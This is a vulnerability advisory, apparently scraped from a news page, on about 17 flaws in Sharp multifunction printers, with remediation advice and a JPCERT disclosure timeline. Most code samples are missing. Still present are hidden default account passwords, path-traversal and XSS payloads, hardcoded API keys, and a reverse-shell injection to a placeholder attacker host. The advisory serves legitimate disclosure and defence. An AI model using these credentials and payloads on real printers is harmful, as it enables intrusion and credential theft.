2024 06 27 Sharp Mfp 17 Vulnerabilities
Multifunction printers offer more than just print. These devices integrate the power of a printer, photocopier and scanner into one single device. From
Multifunction printers offer more than just print. These devices integrate the power of a printer, photocopier and scanner into one single device.
From
Vulnerability Summary
Vulnerable versions: 308 different models of Sharp Multi-Function Printers (MFP) are vulnerable. It is recommended to visit the official Sharp advisory and apply security patches and replace unsupported Multi-Function Printers (MFP) models.
The summary of the vulnerabilities is as follows:
CVE-2024-28038 - Memory corruption in the main program - Remote Code Execution against the web server without authentication
CVE-2024-36251 - Invalid (0x000000d0) pointer dereference - Remote DoS without authentication
CVE-2024-28955, CVE-2024-29146, CVE-2024-29978, CVE-2024-32151 - World-readable coredump files and insecure storage of credentials
CVE-2024-33605 - Arbitrary Directory Listing without authentication
non-assigned CVE vulnerability - Local File Inclusion allowing to read any file (e.g. Coredump files) without authentication 5.1 Generation of the coredump file on the printer 5.2 Local File Inclusion of the coredump file 5.3 Retrieve of credentials using the coredump files 5.4 Retrieve of credentials using configuration files
CVE-2024-33610 - Backdoor webpage - Listing of session cookies without authentication
non-assigned CVE vulnerability - Configuration webpages reachable without authentication
CVE-2024-33610 - Reboot without authentication - Remote DoS
CVE-2024-35244 - Backdoor access - Service
non-assigned CVE vulnerability - Backdoor access - FSS User
non-assigned CVE vulnerability - Insecure default credentials
CVE-2024-33616 - Read admin access on telnet
non-assigned CVE vulnerability - XSS on all the Sharp printers (login.html)
non-assigned CVE vulnerability - XSS on all the Sharp printers (all other HTML pages)
CVE-2024-34162 - Exfiltration of LDAP credentials by downgrading the security
CVE-2024-36248 - Hardcoded Google API Keys
non-assigned CVE vulnerability - Hardcoded Amazon API Keys
N-day CVE-2022-45796 - Remote Code Execution
TL;DR: An attacker can compromise Sharp Multi-Function Printers using multiple vulnerabilities.
List of vulnerable models of Sharp Multi-Function Printers (308 models):
Miscellaneous notes :
This security assessment was entirely done using a blackbox approach and fully-remote - I only had some IPs of printers (no physical access and no credentials for admin or normal users). Consequently, the physical security of the printers was not analyzed and the vulnerabilities were confirmed with 15 different models running the latest firmware versions (MX-3060N, MX-3061, MX-3070N, MX-3560N, MX-3561, MX-5070V, MX-5071, MX-C3051R MX-C3081R, MX-M365N, MX-M453U, MX-M465N, MX-M5050, MX-M5051, MX-M6051 and MX-M6071).
The vulnerabilities were communicated to JPCERT on June 1, 2023 and communications with JPCERT were very effective - they fully managed interactions with Sharp.
An attacker can compromise Sharp multi-function printers (MFP) and execute code. These printers are running Linux and are powerful. They are ideal to host implants (and fun programs, like Bettercap) and move laterally inside infrastructures.
Use network segmentation to isolate MFPs.
Apply security patches.
Replace unsupported MFPs.
Details - Memory corruption in the main program - Remote Code Execution against the web server without authentication
This main program runs as root and its HTTP stack is vulnerable, without authentication, to a stack-based buffer overflow, allowing an attacker to redirect the control flow of the program and achieve remote code execution.
main program listening on port 80/tcp:
This payload will send a MFPSESSIONID cookie with a payload of 643 bytes. This payload will overwrite a stack buffer inside the main program. The buffer is probably 639 bytes and EDBB will overwrite the stack:
If /system.html does not exist, it is possible to use /main.html or any existing html webpage instead:
If the first exploitation does not work, it is possible to resend it again to overwrite the stack the second time:
The dmesg output on the printer will confirm that the main program crashed while trying to reach the address 0x42434445, corresponding to the EDCB sent inside the cookie. EDCB is represented in the little-endian format as ARM is little-endian and 0x42434445 can be found inside several registers (but not PC).
On the printer, using GDB, we will confirm the main program crashed and the stack has been successfully corrupted:
There is no ASLR in the main program; the addresses are always identical therefore exploitation is very likely.
Exploitation was not attempted since no enough time was allocated to develop such exploit during this security assessment and I already had a remote shell as root on the printers. Sharp confirmed that exploitation is possible.
An attacker with a RCE vulnerability can then move laterally and use Wifi to exfiltrate information:
Details - Invalid (0x000000d0) pointer dereference - Remote DoS without authentication
It was observed that the /billcodedef_sub_sel.html webpage is reachable without authentication on Sharp printers. A specific request to this webpage will trigger an invalid pointer deference in the main program. The printer will then reboot after creating coredump files.
When submitting the request with the Sub Code test by pressing Start(Q) , the HTTP request will be:
HTTP request using the HTML form from billcodedef_sub_sel.html :
It is possible to modify the HTTP request to change curr_page_url=%2Fbillcodedef_sub_sel.html to curr_page_url=%2Fbillcodedef_sub_sel.html? . A question mark was added after billcodedef_sub_sel.html .
The resulting request will be:
The corresponding malicious HTTP request to trigger the DoS is:
We can also reproduce the issue using curl:
On the printer, we can see a crash:
With the creation of the corresponding coredump files:
Details - World-readable coredump files and insecure storage of credentials
It was observed that the coredump files located in the Sharp printers have incorrect permissions. Any local user can read them. These coredump files contain all the clear-text credentials of the users.
Core files present in /mnt/log:
The files are world-readable and contain valid coredump files as shown below:
The core file contains in clear-text:
password for all the users (even when the printer booted and no user logged into the printer (!));
For example, some keys:
The core file contains the password ( PASS-PIERRE ) of the admin user even when the admin user has not been logged-in the printer since the printer booted:
All the clear-text passwords can be found inside the core file:
There is no encryption for the /mnt/log partition:
All the passwords can be found inside the core file after the printer just booted and no user logged: this is abnormal and shows the authentication mechanism is incorrectly implemented.
A local attacker can extract all the passwords.
A remote attacker using an additional vulnerability (e.g. Local File Inclusion) can recover all the passwords and compromise the printer (see the vulns).
Details - Arbitrary Directory Listing without authentication
It was observed that Sharp printers are vulnerable to an arbitrary directory listing without authentication. Any attacker can list any directory located in the printer and recover any file.
It is possible to list the manual index files by visiting the /installed_emanual_list.html without authentication:
Request to installed_emanual_list.html?folder=../../../ will list the / file system:
Files located in /etc:
Using the vulnerability Local File Inclusion allowing to read any file (e.g. Coredump files) , it is then possible to download any file.
An attacker can browse the file systems of the printers and download any file.
A remote attacker can recover all the passwords by downloading coredump files and compromise the printer.
Details - Local File Inclusion allowing to read any file (e.g. Coredump files) without authentication
It was observed that Sharp printers are vulnerable to a local file inclusion without authentication. Any attacker can read any file located in the printer.
Normal request to retrieve the manual index files:
The normal request is:
The path= argument can be manipulated to retrieve any file in the printer. The session cookie is not required as this vulnerability does not require authentication:
For example, retrieving /etc/passwd:
It is possible to generate a coredump file, download it and extract credentials to remotely compromise the printer without credentials using this vulnerability along with the vulnerabilities:
Invalid (0x000000d0) pointer dereference - Remote DoS without authentication or
Memory corruption in the main program - Remote Code Execution against the web server without authentication and
World-readable coredump files and insecure storage of credentials ,
Generation of the coredump file on the printer
Using the HTTP request:
Local File Inclusion of the coredump file
We download the coredump file using the Local File Inclusion:
We remove the first 9 lines from the core file (corresponding to HTTP headers) to generate a valid gzip file:
Retrieve of credentials using the coredump files
The core file contains the password ( PASS-PIERRE ) of the admin user even when the admin user has not been logged-in to the printer since the printer booted:
All the passwords can be found inside the core file, located near the admin string:
Retrieve of credentials using configuration files
The configuration files containing the credentials can be found in the /mnt/std04/DBMS/uaccnt.
When a password is updated, the files present in /mnt/std04/DBMS/uaccnt/* will be updated. It is possible to retrieve some credentials from these files:
An attacker can download these files and analyze them to retrieve the passwords.
Details - Backdoor webpage - Listing of session cookies without authentication
It was observed that Sharp printers are vulnerable to a listing of session cookies without authentication. Any attacker can list valid cookies by visiting a backdoor webpage and use them to authenticate to the printers.
It is possible to list the MFPSESSIONID session cookies by visiting the /sessionlist.html webpage without authentication:
It is also possible to use curl from another machine:
An attacker can retrieve valid session cookies and compromise the printer.
Note that a victim user must have been logged inside the printer prior to this attack in order to retrieve the corresponding session cookies.
Details - Configuration webpages reachable without authentication
It was observed that some authenticated webpages are reachable without authentication on Sharp printers. Any attacker can modify parameters on these webpages without authentication.
A list of webpages supposed to require authentication but reachable without authentication is listed below:
/address_smime_install.html
/send_fax_fcode_entry.html
/send_fax_fcode_entry_relay.html
/send_inbound_address_entry.html
/send_inbound_entry.html
/send_receive_fw.html
For example, /printer_ps.html :
An attacker can modify parameters of the printers without authentication.
The vendor confirmed this is the attended behavior.
Details - Reboot without authentication - Remote DoS
It was observed that a specific webpage is reachable without authentication on Sharp printers. Any attacker can use this webpage to reboot the printer.
It is possible to reboot the printer by visiting the /sys_trayentryreboot.html without authentication.
When confirming the Reboot Now action, the printer will reboot:
The printer will then reboot and will be unreachable for some minutes:
An attacker can DoS the printer by rebooting it indefinitely.
Details - Backdoor access - Service
Sharp printers are configured with default credentials. Some accounts are hidden and can be abused by attackers to compromise the printers.
When analyzing the configuration of the printers, it appears there are several accounts visible on the web interface:
Administrator (uid 3)
System Administrator (uid 8, as System Operator )
Device Account (uid 9)
After doing reverse engineering, the default passwords have been obtained:
System Administrator: sysadmin
Device Account: deviceaccount
The Service account (corresponding to uid 4) does not appear on the user list, is not documented and allows an attacker to change the configuration of the printers and update the firmware image. The password for Service is service .
Several webpages can be found corresponding to this service user:
/devicecloning_pp.html
/service_ura_status_page.html
/service_testpage_ok.html
/service_testpage.html
/service_syslog_view.html
/service_syslog_settings_storage.html
/service_syslog_settings_server.html
/service_syslog_setting.html
/service_syslog_select.html
/service_syslog_save.html
/service_syslog_download.html
/serfildata_savepc.html
/service_account.html
/service_device_cloning.html
/service_filingdata.html
/service_testpage.html
/service_testpage.html
/service_font_down.html
/service_joblog_list.html
/service_joblog_download.html
/service_joblog_select.html
/service_joblog_list_download.html
/service_machineid.html
/service_password.html
/sys_paperproperty.html
/sys_paperproperty_entry.html
The service account can be discovered by visiting the webpage but the information cannot be edited:
The service account can be used to change the configuration of the printer. The default webpage is and provides access to a lot of hidden functionalities:
Update of the firmware image to insert a malicious firmware image
Configuration of the log server (disabling the logs, erasing the logs, ...)
Update of the firmware:
An attacker can use this additional backdoor account to compromise the printers.
Details - Backdoor access - FSS User
Sharp printers are configured with default credentials. Some accounts are hidden and can be abused by attackers to compromise the printers.
When analyzing the configuration of the printers, it appears there are several accounts visible on the web interface:
Administrator (uid 3)
System Administrator (uid 8, as System Operator )
Device Account (uid 9)
After doing reverse engineering, the default passwords have been obtained:
System Administrator: sysadmin
Device Account: deviceaccount
The FSS User account (corresponding to uid 7) does not appear on the user list, is not documented and allows an attacker to change the configuration of the printers and update the firmware image.
The password for FSS User is servicefss .
The FSS User has also admin privileges.
Several webpages can be found corresponding to this service user:
/fss_backup_export.html
/fss_backup_reboot.html
The service account can be discovered by visiting the webpage but the information cannot be edited:
The FSS User account can be used to change the configuration of the printer. The default webpage is and provides access to hidden functionalities related to the support and a blind SSRF vulnerability:
Reboot of the printer:
An attacker can use this additional backdoor account to compromise the printers.
Details - Insecure default credentials
Sharp printers are configured with default and insecure credentials.
When doing reverse engineering against the main binary located inside the Sharp firmware image, we can extract the list of passwords for:
Administrator / admin
Device Account / deviceaccount
FSS User / servicefss
System Operator / sysadmin
Listing of username when analyzing main:
The listing of users can be retrieved from the web interface, using the admin user:
Other User -
Vender -
Administrator -
Service -
User -
Vender2 -
FSS User - with admin privileges
System Operator -
Device Account - with admin privileges
An attacker can use these default accounts to compromise the printers.
The vendor confirmed this is the attended behavior.
Details - read admin access on telnet
It is possible to bypass the authentication of the telnet server of any Sharp Printer (running any firmware version) by specifying an invalid user.
This authentication bypass provides an attacker with a full READ admin access to the printer.
Without the corresponding password of the admin user, the access will be denied:
It is possible to send an invalid username (e.g. adminAAAAAAAAAAAAAAAA[...] ) to bypass the authentication and get READ access with admin privileges:
Details - XSS on the /login.html page
There are 2 reflected XSS vulnerabilities located in the /login.html webpage.
HTTP request sent to /login.html , with the query string containing the payload ";alert('XSS');" :
The first XSS appears on the response on line 32:
The second XSS appears on the response on line 183:
Details - XSS on all other HTML pages
There are 3 reflected XSS vulnerabilities located in all the html webpages.
An attacker can send a HTTP request to any HTML webpage with the query string containing ";alert(1); to trigger:
2 JavaScript-based XSS
The HTTP request is sent to /main.html , with the query string containing the payload ";alert(1); :
The first XSS appears on the response on line 32:
The second XSS appears on the response on line 87:
The third XSS appears on the response on line 221:
From the tests, all the HTML webpages are vulnerable to these 3 XSS.
Details - Exfiltration of LDAP credentials by downgrading the security
Sharp printers can be configured with a connection to a LDAP server, with credentials.
While the LDAP password is not shown on the web interface, an attacker with the admin password can retrieve the password by downgrading the authentication type to SIMPLE , which will enable clear-text communication to a malicious server.
With the Connect Test , an attacker can downgrade the security of the authentication to SIMPLE and retrieve the password in clear-text by specifying a malicious OpenLDAP server:
LDAP Configuration -
With a malicious OpenLDAP server receiving the connection, the password will be displayed in the logs:
It is also possible to use wireshark to display the password.
Details - Hardcoded Google API Keys
The printers contain private API Keys in the main program.
It is possible to retrieve specific googlecontent.com domain names in the main program:
Reverse Engineering of the sub_2146D54() function defined in the main program will reveal some hardcoded keys:
The domains listed in the binary are:
265490466885-m5cjvglv9q8aak493cgepe7juvafgh8c.apps.googleusercontent.com
347970444986-0pij6u2tfhb240edjmls3h1u8qm2v2b3.apps.googleusercontent.com
410988772526-6ujegl6jvquh9kstiegva8fk5j2ogag9.apps.googleusercontent.com
292646726735-033ggn9hmlrs8bntrj0fbstob9m8qt26.apps.googleusercontent.com
These domains do not appear to be used anymore and are free for any user. An attacker can use them to receive traffic from the printers.
Details - Hardcoded Amazon API Keys
The printers contain private API Keys in the main program.
It is possible to retrieve a specific amazonaws.com address in the main program:
When Cross-referencing this address, it appears that some private API keys are hardcoded in the program, as shown below:
Postman private key: 44688039-5104-39be-f974-c1f5ef621a5f
API-KEY: PBYXSIK6av8fBt8Qe1EQUaF9ZaKvTDutaXS9YwWA
Reverse Engineering of the sub_20D542C function defined in the main program:
We can see that curl is invoked with the -k option (aka --insecure ) so any invalid SSL certificate will be accepted:
The pseudo-code of sub_20D542C() is:
Details - CVE-2022-45796 - RCE
Since the PoC for CVE-2022-45796 was not public, an authenticated admin user can go to and use the IPv6 IP field to exploit a command injection:
Using Burp, an attacker can intercept the resulting request and inject a command inside the vulnerable ggt_textbox(16) field, for example, ggt_textbox%2816%29=%7Cbash+-i+%3E%26+%2Fdev%2Ftcp%2Fattacker_ip%2F443+0%3E%261 corresponding to the payload |bash -i /dev/tcp/attacker_ip/443 0>&1 .
The attacker will receive a root shell from the printers and will get a full admin access, allowing to backdoor the printer for persistence:
JPCERT provided a security bulletin .
Sharp provided a security bulletin .
Toshiba provided a security bulletin .
May 2023: Security assessment performed on Sharp Multi-function printers.
June 1, 2023: A complete report was sent to JPCERT (security for Sharp).
June 6, 2023: JPCERT aknowledged the reception of the security assessment and asked more information the security .
June 7, 2023: Information the security provided to JPCERT.
June 7, 2023: JPCERT confirmed the reception of the security .
Jul 17, 2023: Questions sent to JPCERT asking for any feedback from Sharp.
Jul 18, 2023: JPCERT confirmed that they had a meeting with Sharp a week ago. Sharp finished the investigation and was preparing a document listing all the issues.
Jul 25, 2023: JPCERT provided the Excel file with Sharp's .
Jul 26, 2023: I confirmed the reception of the documents
Jul 28, 2023: sent to JPCERT in the Excel file to ask to re-evaluate some issues.
Aug 1, 2023: Received responses from JPCERT regarding some of the issues.
Aug 1, 2023: Additional information provided to JPCERT regarding a potential disclosure of vulnerabilities if the issues are not patched. I suggested a tripartite meeting with Sharp and JPCERT to review the issues.
Aug 2, 2023: JPCERT suggested solutions to get security patches in a timely manner by prioritizing issues.
Aug 3, 2023: Agreed with JPCERT to prioritize vulnerabilities based on severity, then patch critical vulnerabilities as soon as possible while delaying hard-to-fix vulnerabilities.
Aug 4, 2023: JPCERT confirmed that they are working with Sharp to get the issues fixed.
Aug 16, 2023: JPCERT confirmed that they asked Sharp to reconsider some of the issues with two buckets (short-term fixes and long-term countermeasures) and that Sharp was working on the issues.
Sep 13, 2023: I answered that it is an acceptable practice, since short-term fixes and long-term countermeasures are currently being implemented by other printer vendors.
Sep 14, 2023: JPCERT confirmed that they are working with Sharp to get security patches.
Oct 10, 2023: I confirmed the reception of the updates.
Nov 16, 2023: JPCERT provided a new Excel file with the issues and the countermeasures provided by Sharp.
Nov 21, 2023: Excel file was reviewed and Sharp suggested to patch vulnerable code and remove vulnerable features.
Jan 29, 2024: Asking the status of the vulnerabilities (CVE, availability of security patches).
Jan 30, 2024: JPCERT confirmed that a JVN advisory will be published with corresponding CVEs. Security patches will be provided by May 2024.
Jan 30, 2024: I suggested to test patched firmware images to confirm that vulnerabilities were correctly patched.
Jan 31, 2024: JPCERT passed the message to Sharp regarding additional tests of patched firmware images.
Feb 16, 2024: JPCERT sent the updated Excel file containing the vulnerabilities.
Feb 16, 2024: Confirmation of the reception of the Excel file.
Feb 20, 2024: Updated Excel file sent to JPCERT with my .
Mar 1, 2024: JPCERT sent regarding my feedbacks.
Mar 4, 2024: I confirmed the reception of the feedbacks.
May 8, 2024: Email asking JPCERT when the security advisories and security patches will be published.
May 16, 2024: JPCERT sent a list of affected products/versions and confirmed that they are working on a draft.
May 20, 2024: I suggested to include unsupported models since, based on my testing, some unsupported models were vulnerable.
May 21, 2024: JPCERT reported sending this suggestion to Sharp.
May 28, 2024: JPCERT provided the JVN English edition draft advisory, the final list of affected products and Toshiba Tech MFPs information.
May 28, 2024: I asked JPCERT to provide me with the list of CVEs for the list of vulnerabilities I reported.
May 29, 2024: JPCERT provided a list of vulnerabilities along with CVEs and clarifications regarding some of the findings.
May 30, 2024: Confirmation sent to JPCERT that the list was received.
May 31, 2024: JPCERT published a security advisory: .
May 31, 2024: Sharp published a security advisory: .
May 31, 2024: Toshiba published a security advisory: .
June 27, 2024: A security advisory is published.
These vulnerabilities were found by Pierre Barre aka Pierre Kim ( @PierreKimSec ).
This advisory is licensed under a Creative Commons Attribution Non-Commercial -Alike 3.0 License:
published on 2024-06-27 00:00:00 by Pierre Kim
The full story
This article is one source in a clustered incident — the cluster page carries the summary, timeline and every other outlet covering it.
